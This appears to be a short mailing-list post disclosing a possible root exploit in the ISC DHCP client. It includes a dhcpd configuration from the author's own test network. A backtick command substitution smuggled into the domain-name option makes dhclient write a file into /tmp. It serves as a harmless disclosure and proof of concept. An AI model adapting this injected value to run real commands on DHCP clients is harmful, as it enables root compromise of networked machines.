Somebody at OpenBSD discovered a possible root exploit in the ISC DHCP
client.

I can confirm that as of 6:23am on June 23rd after several hours of
hacking around the sources I had the following dhcpd config running on my
own machine's private network for testing:

    shared-network LOCAL-NET {
        option  domain-name "my.`echo hi > /tmp/oops`.domain";
        option  domain-name-servers 192.168.1.3, 192.168.1.5;

        subnet 192.168.1.0 netmask 255.255.255.0 {
                option routers 192.168.1.1;

                range 192.168.1.32 192.168.1.127;
        }
    }

... and when dhclient finished running I had a nice little present
in /tmp/ named 'oops' that contained the string 'hi' ..